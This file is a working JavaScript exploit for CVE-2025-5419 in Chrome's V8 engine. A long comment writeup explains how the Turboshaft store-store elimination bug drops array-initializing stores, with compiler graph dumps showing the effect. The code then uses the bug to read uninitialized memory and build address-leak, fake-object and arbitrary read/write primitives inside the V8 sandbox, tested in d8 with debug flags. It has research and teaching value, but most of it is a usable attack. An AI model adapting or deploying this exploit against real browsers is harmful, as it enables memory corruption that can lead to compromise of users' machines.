//Exploit for CVE-2025-5419
//author: mistymntncop
//
//Based on the ITW exploit (author unknown) found by Clement Lecigne and Benoît Sevens.
//
// Build d8 using:
// a) Run once
//    git checkout 5c198837c21b9b6cde113c4cb35d00e6b368f9a5
//    gclient sync
//    gn gen ./out/x64.debug
//    gn gen ./out/x64.release
// b) 
//    Debug Build:
//    You will need to patch the "ShouldZapGarbage" function in "./heap/zapping.h"
//    to return false. This function returns false in release builds.
//
//    ninja -C ./out/x64.debug d8
//      
//    Release Build:
//    ninja -C ./out/x64.release d8
//    
//Run with:
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax exploit.js
//  C:\path\to\v8\v8\out\x64.release\d8 --allow-natives-syntax exploit.js
//
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax --trace-turbo-graph --trace-turbo exploit.js
//
//
//Writeup
//=================
//https://github.com/v8/v8/blob/7bc0a67ebfbf44e7adab47fc2bbbe308660e27f4/src/compiler/turboshaft/store-store-elimination-reducer-inl.h#L21
//
// StoreStoreEliminationReducer tries to identify and remove redundant
// stores. E.g. for an input like
//
//   let o = {};
//   o.x = 2;
//   o.y = 3;
//   o.x = 4;
//   use(o.x);
//
// we don't need the first store to `o.x` because the value is overwritten
// before it can be observed.
//
//This optimization relies on the compiler correctly modelling the location that loads/stores
//access. 
//
//https://github.com/v8/v8/commit/7bc0a67ebfbf44e7adab47fc2bbbe308660e27f4
//
//       case Opcode::kLoad: {
//         const LoadOp& load = op.Cast<LoadOp>();
//         // TODO(nicohartmann@): Use the new effect flags to distinguish heap
//         // access once available.
//         const bool is_on_heap_load = load.kind.tagged_base;
//+        const bool is_fixed_offset_load = !load.index().valid();
//         // For now we consider only loads of fields of objects on the heap.
//+        if (is_on_heap_load) {
//+          if (is_fixed_offset_load) {
//+            table_.MarkPotentiallyAliasingStoresAsObservable(load.base(),
//+                                                             load.offset);
//+          } else {
//+            // A dynamically indexed load might alias any fixed offset.
//+            table_.MarkAllStoresAsObservable();
//+          }
//         }
//         break;
//       }
//
//Looking at the patch we see that load operations now call "MaybeRedundantStoresTable::MarkAllStoresAsObservable" 
//in the case of a indexed load. An index load corresponds to something like "arr[index]" in JS. Previously  
//in the unpatched version this meant that indexed loads would be invisible to the store store reducer. 
//This would mean that they could potentially alias with previous stores. Simply, it is trivial to see that  
//"arr[0] = 1" and "arr[index]" would alias when index = 0.
//
//let index = 0;
//let arr = [];
//arr[0] = 1;
//let x = arr[index];
//arr[0] = 2;
//
//Because the "arr[index]" load was unobserable, the compiler errenously thinks that the "arr[0] = 1" store is 
//redudant and is free to remove it. This gives the attacker the primitive to erroneously remove store operations.
//To exploit this primitive we need to remove the initializing store of an array. That is the first stores
//to an array that populates the arrays elements. By removing this store the memory accessed by our indexed load will 
//not have been initialized. By reading uninitialized memory we can create futher infoleak and fake object
//primitives which will us to escalate to full primitives within the V8 sandbox.
//
//We can use the D8 flags "--trace-turbo-graph --trace-turbo" to see the compilation graph generated by Turboshaft.
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax --trace-turbo-graph --trace-turbo exploit.js
//
//We will only be looking at the graph for the "vuln_fake_obj" function as it is simpler.
//We are interested in the "V8.TFTurboshaftStoreStoreElimination" and "V8.TFTurboshaftLoopUnrolling" (this reducer 
//occurs before the store store reducer) reducer phases.
//
//Instruction #38 "Allocate(#31)" allocates the FixedArray of array "o = [0x11111111, 0x22222222, obj];".
//Instruction #39 "Store *(#38) = #32" stores the the FixedArray's map.
//Instructions #41 "Constant()[smi: 3]" and #42 "Store *(#38 + 4) = #41" set the length of the FixedArray.
//Instructions 
//    #43 "Store *(#38 + 8) = #33", 
//    #45 "Store *(#38 + 12) = #35", 
//    #46 "Store *(#38 + 16) = #34"
//are the initializing stores for FixedArray. These correspond to setting the values 0x11111111, 0x22222222, obj.
//
//We wish to remove the instruction #43, the first store (0x11111111). 
//
//Instruction #55 "Load *(#38 + 8 + #54*4)" is the indexed load corresponding to "result = o[key]". 
//Instruction #59 "Store *(#38 + 8) = #58" is the final store "o[0] = 123" which is needed to make 
//the instruction #43 "Store *(#38 + 8) = #33" seem redudant.
//
//As an aside, importantly we must move the #30 "DeoptimizeIf" instruction (which corresponds to the array bounds check)
//to be before #38 "Allocate(#31)". This instruction would interrupt our plans as when the store store reducer 
//encounters a "DeoptimizeIf" it marks all previous stores as observable. We can achieve this easily by performing 
//a bounds check on a array of the same size beforehand.
//
//Another detail worth mentioning is that we can't materialize the actual JSArray corresponding to the object "o".
//This would result in another "Allocate" instruction being emitted before the initializing stores #43, #45, #46.
//When the store store reducer encounters an Allocate instruction it would also mark all previous stores as observable.
//We can easily not materialize this object by not returning it. The "V8.TFEscapeAnalysis" reducer phase will see
//that this object is not returned and will remove the allocation of the JSArray itself leaving only the FixedArray
//elements. 
//
//----- V8.TFTurboshaftLoopUnrolling -----
//
//MERGE B0
//    0: Parameter()[5, %context]
//    1: Parameter()[0, %this]
//    3: Parameter()[1]
//    4: Constant()[heap object: 0x040500065031 <JSFunction vuln_fake_obj (sfi = 0000040500064AF1)>]
//    5: FrameState(#4, #1, #3, #0)[not inlined, UNOPTIMIZED_FRAME, -1, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . .]
//    7: Constant()[heap object: 0x04050004b5cd <NativeContext[303]>]
//    8: JSStackCheck(#7, #5)[function-entry]
//    9: FrameState(#4, #1, #3, #0, #3)[not inlined, UNOPTIMIZED_FRAME, 2, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . #3(kRepTagged|kTypeAny)]
//   12: Constant()[word64: 6]
//   13: Constant()[heap object: 0x040500065841 <FixedArray[3]>]
//   14: Constant()[heap object: 0x0405000007bd <FixedArray[0]>]
//   15: Constant()[heap object: 0x0405000534bd <Map[16](PACKED_SMI_ELEMENTS)>]
//   16: Constant()[word32: 1]
//   17: WordBinop(#3, #16)[BitwiseAnd, Word32]
//   18: Constant()[word32: 0]
//   19: Comparison(#17, #18)[Equal, Word32]
//   20: DeoptimizeIf(#17, #9)[NotASmi, FeedbackSource(INVALID)]
//   21: TaggedBitcast(#3)[Tagged, Word32, Smi]
//   22: Shift(#21, #16)[ShiftRightArithmeticShiftOutZeros, Word32]
//   23: FrameState(#4, #1, #22, #0, #15, #14, #13, #12, #22)[not inlined, UNOPTIMIZED_FRAME, 14, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #22(kRepWord32|kTypeInt32) #0(kRepTagged|kTypeAny) $0(field count: 4) #15(kRepTagged|kTypeAny) #14(kRepTagged|kTypeAny) #13(kRepTagged|kTypeAny) #12(kRepTagged|kTypeAny) . . . #22(kRepWord32|kTypeInt32)]
//   27: Constant()[word32: 3]
//   28: Constant()[word32: 6]
//   29: Comparison(#22, #27)[UnsignedLessThan, Word32]
//   30: DeoptimizeIf(#29, #23)[negated, OutOfBounds, FeedbackSource(INVALID)]
//   31: Constant()[word64: 20]
//   32: Constant()[heap object: 0x0405000005dd <Map(FIXED_ARRAY_TYPE)>]
//   33: Constant()[word64: 572662306]
//   34: Constant()[word64: 0]
//   35: Constant()[word64: 1145324612]
//   36: Constant()[word64: 1]
//   37: Constant()[word64: 2]
//   38: Allocate(#31)[Young, tagged aligned]
//   39: Store *(#38) = #32 [tagged base, TaggedPointer, NoWriteBarrier, initializing]
//   41: Constant()[smi: 3]
//   42: Store *(#38 + 4) = #41 [tagged base, TaggedSigned, NoWriteBarrier, offset: 4, initializing]
//   43: Store *(#38 + 8) = #33 [tagged base, AnyTagged, NoWriteBarrier, offset: 8, initializing]
//   45: Store *(#38 + 12) = #35 [tagged base, AnyTagged, NoWriteBarrier, offset: 12, initializing]
//   46: Store *(#38 + 16) = #34 [tagged base, AnyTagged, NoWriteBarrier, offset: 16, initializing]
//   48: Constant()[heap object: 0x040500053e61 <Map[16](PACKED_ELEMENTS)>]
//   49: Constant()[heap object: 0x04050006e625 <Object map = 000004050004C30D>]
//   50: Constant()[word64: 4]
//   51: Constant()[word32: 2]
//   52: Goto()[B1, 0]
//
//MERGE B1 <- B0
//   53: Store *(#38 + 16) = #49 [tagged base, AnyTagged, PointerWriteBarrier, offset: 16]
//   54: Change(#22)[ZeroExtend, NoAssumption, Word32, Word64]
//   55: Load *(#38 + 8 + #54*4) [tagged base, AnyTagged, Tagged, element size: 2^2, offset: 8]
//   57: Goto()[B2, 0]
//
//MERGE B2 <- B1
//   58: Constant()[word64: 246]
//   59: Store *(#38 + 8) = #58 [tagged base, AnyTagged, NoWriteBarrier, offset: 8]
//   60: Return(#18, #55)[0]
//
//After the "V8.TFTurboshaftStoreStoreElimination" reducer phase we see that the instruction 
//#43 "Store *(#38 + 8) = #33" has been removed. This allows the instruction #45 "Load *(#35 + 8 + #44*4)"
//to access uninitialized memory.
//
//----- V8.TFTurboshaftStoreStoreElimination -----
//
//MERGE B0
//    0: Parameter()[5, %context]
//    1: Parameter()[0, %this]
//    3: Parameter()[1]
//    4: Constant()[heap object: 0x040500065031 <JSFunction vuln_fake_obj (sfi = 0000040500064AF1)>]
//    5: FrameState(#4, #1, #3, #0)[not inlined, UNOPTIMIZED_FRAME, -1, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . .]
//    7: Constant()[heap object: 0x04050004b5cd <NativeContext[303]>]
//    8: JSStackCheck(#7, #5)[function-entry]
//    9: FrameState(#4, #1, #3, #0, #3)[not inlined, UNOPTIMIZED_FRAME, 2, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . #3(kRepTagged|kTypeAny)]
//   12: Constant()[word64: 6]
//   13: Constant()[heap object: 0x040500065841 <FixedArray[3]>]
//   14: Constant()[heap object: 0x0405000007bd <FixedArray[0]>]
//   15: Constant()[heap object: 0x0405000534bd <Map[16](PACKED_SMI_ELEMENTS)>]
//   16: Constant()[word32: 1]
//   17: WordBinop(#3, #16)[BitwiseAnd, Word32]
//   18: Constant()[word32: 0]
//   19: DeoptimizeIf(#17, #9)[NotASmi, FeedbackSource(INVALID)]
//   20: TaggedBitcast(#3)[Tagged, Word32, Smi]
//   21: Shift(#20, #16)[ShiftRightArithmeticShiftOutZeros, Word32]
//   22: FrameState(#4, #1, #21, #0, #15, #14, #13, #12, #21)[not inlined, UNOPTIMIZED_FRAME, 14, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #21(kRepWord32|kTypeInt32) #0(kRepTagged|kTypeAny) $0(field count: 4) #15(kRepTagged|kTypeAny) #14(kRepTagged|kTypeAny) #13(kRepTagged|kTypeAny) #12(kRepTagged|kTypeAny) . . . #21(kRepWord32|kTypeInt32)]
//   26: Constant()[word32: 3]
//   27: Constant()[word32: 6]
//   28: Comparison(#21, #26)[UnsignedLessThan, Word32]
//   29: DeoptimizeIf(#28, #22)[negated, OutOfBounds, FeedbackSource(INVALID)]
//   30: Constant()[word64: 20]
//   31: Constant()[heap object: 0x0405000005dd <Map(FIXED_ARRAY_TYPE)>]
//   32: Constant()[word64: 572662306]
//   33: Constant()[word64: 0]
//   34: Constant()[word64: 1145324612]
//   35: Allocate(#30)[Young, tagged aligned]
//   36: Store *(#35) = #31 [tagged base, TaggedPointer, NoWriteBarrier, initializing]
//   38: Constant()[smi: 3]
//   39: Store *(#35 + 4) = #38 [tagged base, TaggedSigned, NoWriteBarrier, offset: 4, initializing]
//   40: Store *(#35 + 12) = #34 [tagged base, AnyTagged, NoWriteBarrier, offset: 12, initializing]
//   42: Constant()[heap object: 0x04050006e625 <Object map = 000004050004C30D>]
//   43: Store *(#35 + 16) = #42 [tagged base, AnyTagged, PointerWriteBarrier, offset: 16]
//   44: Change(#21)[ZeroExtend, NoAssumption, Word32, Word64]
//   45: Load *(#35 + 8 + #44*4) [tagged base, AnyTagged, Tagged, element size: 2^2, offset: 8]
//   47: Constant()[word64: 246]
//   48: Store *(#35 + 8) = #47 [tagged base, AnyTagged, NoWriteBarrier, offset: 8]
//   49: Return(#18, #45)[0]
//
//Extra Reading
//=======================
//https://v8.dev/blog/trash-talk
//https://jayconrod.com/posts/55/a-tour-of-v8-garbage-collection

function gc_minor() { //scavenge
    let arr = new Array(0x10000);
    for(let i = 0; i < arr.length; i++) {
        arr[i] = new String("");
    }
}

function gc_major() { //mark-sweep
    new ArrayBuffer(0x7fe00000);
}

function smi(i) {
    return i << 1n;
}

var conv_ab = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_ab);
var conv_b64 = new BigInt64Array(conv_ab);
var conv_u32 = new Uint32Array(conv_ab);

function dtoi(f) {
    conv_f64[0] = f;
    return conv_b64[0];
}

function itod(i) {
    conv_b64[0] = i;
    return conv_f64[0];
}
const JS_ARRAY_HEADER_SIZE = 16n;
const FIXED_ARRAY_HEADER_SIZE = 8n;
//allocate this upfront and not in vuln_fake_obj
const obj = {};

var large_arr = null;

var packed_dbl_arr_map = null;
var packed_arr_map = null;
var empty_fixed_arr = null;
var large_arr_elements_addr = null;
var fixed_arr_map = null;
var fixed_dbl_arr_map = null;

var fake_arr = null;
var fake_arr_addr = null;
var fake_arr_elements_addr = null;

function fake_obj(addr) {
    large_arr[0] = itod(packed_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod(fake_arr_elements_addr | (smi(1n) << 32n));

    large_arr[3] = itod(addr | 1n);
    
    let result = fake_arr[0];
    
    large_arr[3] = itod(0n);
    
    return result;
}

function addr_of(obj) {
    large_arr[0] = itod(packed_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod(fake_arr_elements_addr | (smi(1n) << 32n));

    fake_arr[0] = obj;
    let result = dtoi(large_arr[3]) & 0xFFFFFFFFn;
    
    large_arr[3] = itod(0n);
    
    return result;
}

function v8_read64(addr) {
    addr -= FIXED_ARRAY_HEADER_SIZE;
    
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod((addr | 1n) | (smi(1n) << 32n));
    
    let result = dtoi(fake_arr[0]);
    
    large_arr[1] = itod(empty_fixed_arr | (smi(0n) << 32n)); 

    return result;    
}

function v8_write64(addr, val) {
    addr -= FIXED_ARRAY_HEADER_SIZE;
    
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod((addr | 1n) | (smi(1n) << 32n));
    
    fake_arr[0] = itod(val);
    
    large_arr[1] = itod(empty_fixed_arr | (smi(0n) << 32n));   
}


function vuln_leak(key) {
    //Force key to be a smi
    key |= 0;
    
    //Force OOB check here
    //This allocation doesn't get materialized
    let o = [1,2,3,4,5,6,7,8];
    let result1 = o[key];
    let result2 = o[key+1];
    let result3 = o[key+2];
    let result4 = o[key+3];
    let result5 = o[key+4];
    let result6 = o[key+5];
    let result7 = o[key+6];
    let result8 = o[key+7];
    
    //Escape analysis doesnt materialize the actual object only the 
    //object's element FixedArray
    //PACKED_DOUBLE_ELEMENTS
    o = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
    
    //Invisible to store store reducer
    result1 = o[key];
    result2 = o[key+1];
    result3 = o[key+2];
    result4 = o[key+3];
    result5 = o[key+4];
    result6 = o[key+5];
    result7 = o[key+6];
    result8 = o[key+7];    
    
    //We need this write so previous writes become unobservable
    o[0] = 123;
    o[1] = 123;
    o[2] = 123;
    o[3] = 123;
    o[4] = 123;
    o[5] = 123;
    o[6] = 123;
    o[7] = 123;

    return [result1, result2, result3, result4, result5, result6, result7, result8];
}

function vuln_fake_obj(key) {
    //Force key to be a smi
    key |= 0;
    
    //Force OOB check here
    //This allocation doesn't get materialized
    let o = [1,2,3];
    let result = o[key];
    
    //Escape analysis doesnt materialize the actual object only the 
    //object's element FixedArray
    //PACKED_ELEMENTS
    o = [0x11111111, 0x22222222, obj];
    
    //invisible to store store reducer
    result = o[key];
    
    //We need this write so previous writes become unobservable
    o[0] = 123;

    return result;
}
 
function install_primitives() {
    //TODO: need proper JIT garantee function...
    //For now we will just use the native syntax functions
    //to force JIT...
    %PrepareFunctionForOptimization(vuln_leak);
    vuln_leak(0);
    %OptimizeFunctionOnNextCall(vuln_leak);
        
    %PrepareFunctionForOptimization(vuln_fake_obj);
    vuln_fake_obj(0);
    %OptimizeFunctionOnNextCall(vuln_fake_obj);
    
    //Preallocate all the base objects so that
    //we don't have to worry about extra objects  
    //from object transitions also being allocated, etc. 
    //We will clone these base objects later.
    let base_block = new Array(22 - (Number(JS_ARRAY_HEADER_SIZE + FIXED_ARRAY_HEADER_SIZE)/4));
    base_block.fill(123);
    for(let i = 0; i < base_block.length; i++) {
        base_block[i] = i;
    }
    
    let float_block = new Array(0x1000);
    float_block.fill(1.1);
        
    let large_base = new Array(0x10000);
    large_base.fill(1.1);
    
    gc_minor();
    gc_major();

    let filler_block = Array.from(base_block);
    large_arr = Array.from(large_base);
    let packed_arr_obj = [large_arr, 0x11223344];
    let packed_dbl_arr_obj = [1.1];
         
/*
    %DebugPrint(filler_block);
    %DebugPrint(large_arr);
    %DebugPrint(packed_arr_obj);
    %DebugPrint(packed_dbl_arr_obj);
    //%SystemBreak();
//*/   
    //we need to remove references to packed_arr_obj, packed_dbl_arr_obj so that they 
    //dont get moved. This would replace their maps with a forwarding addresses which 
    //we do not want...
    packed_arr_obj = null;
    packed_dbl_arr_obj = null;
    
    gc_minor();
    gc_major();

    //trigger vuln to leak addresses
    let leaks = vuln_leak(0);
    packed_arr_map = (dtoi(leaks[3]) >> 32n) & 0xFFFFFFFFn;
    packed_dbl_arr_map = (dtoi(leaks[7]) >> 32n) & 0xFFFFFFFFn;
    large_arr_elements_addr = (dtoi(leaks[0]) >> 32n) & 0xFFFFFFFFn;
    empty_fixed_arr = (dtoi(leaks[0])) & 0xFFFFFFFFn;
    fixed_arr_map = (dtoi(leaks[1]) >> 32n) & 0xFFFFFFFFn;
    fixed_dbl_arr_map = (dtoi(leaks[5]) >> 32n) & 0xFFFFFFFFn;
    
    fake_arr_addr = large_arr_elements_addr + FIXED_ARRAY_HEADER_SIZE;
    fake_arr_elements_addr = fake_arr_addr + 16n;
    
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr >> 32n));
    large_arr[1] = itod(fake_arr_elements_addr | (smi(0n) << 32n));
    large_arr[2] = itod(fixed_arr_map | (smi(1n) << 32n));
    
    let float_filler = Array.from(float_block);
    float_filler.fill(itod(fake_arr_addr | (fake_arr_addr << 32n)));
    
//*
    for(let i = 0; i < leaks.length; i++) {
        let val = dtoi(leaks[i]);
        let a = (val >> 32n) & 0xFFFFFFFFn;
        let b = val & 0xFFFFFFFFn;
        console.log(a.toString(16).padStart(8, "0") + b.toString(16).padStart(8, "0"));
    }
    
    console.log("packed_arr_map = " + packed_arr_map.toString(16));
    console.log("packed_dbl_arr_map = " + packed_dbl_arr_map.toString(16));
    console.log("large_arr_elements_addr = " + large_arr_elements_addr.toString(16));
    console.log("empty_fixed_arr = " + empty_fixed_arr.toString(16));
    console.log("fixed_arr_map = " + fixed_arr_map.toString(16));
    console.log("fixed_dbl_arr_map = " + fixed_dbl_arr_map.toString(16));

    %DebugPrint(leaks);
//*/

    float_filler = null;

    gc_minor();
    gc_major();
    
    let block3 = new Array(0x200);
    block3.fill(0x1111);
    
    //trigger vuln again to materialize fake object
    fake_arr = vuln_fake_obj(0);
}
function test() {
    install_primitives();

    let fake_arr_addr2 = addr_of(fake_arr);
    console.log("fake_arr_addr2 = " + fake_arr_addr2.toString(16));
    
    let x = v8_read64(fake_arr_addr2);
    console.log("x = " + x.toString(16));
    v8_write64(fake_arr_addr2, x);
    
    %DebugPrint(fake_arr);
    
    let fake_arr_test = fake_obj(fake_arr_addr2);
    //%DebugPrint(fake_arr_test);
}
test();